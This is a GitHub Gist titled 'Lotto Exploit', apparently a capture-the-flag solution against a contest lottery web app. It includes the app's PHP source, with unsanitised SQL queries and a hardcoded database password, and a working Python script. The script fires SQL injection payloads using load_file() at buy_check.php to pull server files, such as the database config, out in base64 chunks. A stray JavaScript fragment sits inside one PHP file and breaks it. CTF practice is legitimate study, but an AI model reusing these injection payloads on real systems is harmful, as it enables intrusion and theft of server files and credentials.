Last active
August 3, 2019 16:54
-
-
Save stypr/82fb47f69f97a6452b2a4f5adbb6599e to your computer and use it in GitHub Desktop.
Lotto Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function generator() | |
{ | |
$PATH = "./s3cre7_fi1e"; | |
$init_seed = 0; | |
if(!file_exists(realpath($PATH))) | |
{ | |
$init_seed = $seed = intval(uniqid(),10); | |
$f = fopen($PATH,"w"); | |
fwrite($f,$init_seed); | |
fclose($f); | |
} | |
$f = fopen($PATH,"r"); | |
$data = fread($f,filesize($PATH)); | |
$init_seed = $seed = intval($data,10); | |
srand($init_seed); | |
for( $i=0; $i<$init_seed%100; $i++) | |
{ | |
$seed = rand() * rand(); | |
srand($seed); | |
$tmp = rand()*rand(); | |
$length = strlen($tmp); | |
$cutting = (int)($length/4); | |
$tmp2= substr($seed,$cutting,$length-$cutting*2); | |
$seed = $tmp2*$tmp2; | |
} | |
$ret = array(7); | |
$new_seed = 0; | |
for( $i=0; $i<7; $i++) | |
{ $new_seed = rand(); | |
$number = ($new_seed%77)+1; | |
if(in_array($number,$ret)) | |
{ | |
$i--; | |
continue; | |
} | |
$ret[$i] = $number; | |
} | |
$f = fopen($PATH,"w"); | |
fwrite($f,$new_seed); | |
fclose($f); | |
return $ret; | |
} | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
include '9en3rat0r.php'; | |
include 'd6conn.php'; | |
//if(time()>1509576900) | |
//{ | |
### MAKE LOTTO NUMBERS ### | |
$luckyNumber = generator(); | |
sort($luckyNumber); | |
$luckyNumber = implode(",",$luckyNumber); | |
### CHECK ROUND ### | |
$round = getRound($conn); | |
### CHECK WINNER ### | |
$q = "SELECT * FROM ATTEMPT WHERE no={$round}"; | |
$res =mysqli_query($conn,$q); | |
$Winners = array(); | |
while($row = mysqli_fetch_array($res)) | |
{ | |
if($luckyNumber == $row['numbers']) | |
array_push($Winners,$row['name']); | |
} | |
### WRITE HISTORY ### | |
$Winners = implode(",",$Winners); | |
$q = "INSERT INTO LOG(luckyNumbers,winners) values('{$luckyNumber}','{$Winners}')"; | |
$res = mysqli_query($conn,$q); | |
/* Winners = Sakuya | |
"1":"1',3,(SELECT winners FROM LOG WHERE winners=winners LIMIT 1))-- -", | |
*/ | |
$.post("/buy_check.php", d, function(f){ console.log(f) });""" | |
### WRITE CURRENT TIME ### | |
$f = fopen("/var/www/T1M3","w"); | |
fwrite($f,date("Y-m-d H:i:s")); | |
fclose($f); | |
//} | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$HOST = "locaalhost"; | |
$USER = "lo77o"; | |
$PASS = "g0db!essU"; | |
$DB_NAME = "LOTTO"; | |
$conn = mysqli_connect($HOST,$USER,$PASS,$DB_NAME); | |
function getRound($conn) | |
{ | |
$q = "SELECT max(no)`round` FROM LOG"; | |
$row = mysqli_fetch_array(mysqli_query($conn,$q)); | |
if($row['round'] == "") | |
$row['round'] = 0; | |
return $row['round']+1; | |
} | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from base64 import * | |
import requests | |
import time | |
"""l = "520"; | |
d = {'65':'65', | |
'23':'23', | |
'45':'45', | |
'74':'74', | |
"1":"1',3,(SELECT to_base64(left(right(load_file('/var/www/html/e57717591ebe1d829b3def08f229a53b.php'),"+l+"),20))))-- -", | |
'5':'5', '6':'6'}; | |
$.post("/buy_check.php", d, function(f){ console.log(f) });""" | |
cookie = "" | |
def login(u, p): | |
global cookie | |
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/login_check.php" | |
res = requests.post(url, data = {'userid': u, 'userpw': p}) | |
cookie = res.cookies | |
return res.text | |
def register(u, p): | |
global cookie | |
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/register_check.php" | |
res = requests.post(url, data = {'userid': u, 'userpw': p}) | |
return res.text | |
def parse_history(): | |
global cookie | |
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/?p=history" | |
res = requests.get(url, cookies=cookie) | |
hist = [i.split("<td>")[1:] for i in res.text.split("<tbody>")[1].split("</tbody>")[0].split("<tr>")] | |
return [i[2].split("</td>")[0] for i in hist[1:]] | |
def leak(fn, s=20): | |
global cookie | |
l = str(s) | |
senddata = {'65':'65', '23':'23', '45':'45', '74':'74', '5':'5', '6':'6', \ | |
"1":"1',3,(SELECT to_base64(left(right(load_file('"+fn+"'),"+l+"),20))))-- -" } | |
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/buy_check.php" | |
res = requests.post(url, cookies=cookie, data=senddata) | |
if "Your luckyNumber" in res.text: | |
return True | |
else: | |
return False | |
def leak_file(fn): | |
for i in range(20, 8192, 20): | |
while leak(fn, i) == False: | |
time.sleep(1) | |
pass | |
print('-------------------') | |
print(''.join([b64decode(k) for k in parse_history()[::-1]])) | |
print register('stypry', 'stypry') #duplicate registration possible | |
print login('stypry', 'stypry') | |
#print leak_file("/var/www/html/e57717591ebe1d829b3def08f229a53b.php") | |
#print leak_file("/var/www/html/9en3rat0r.php") | |
print leak_file("/var/www/html/d6conn.php") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment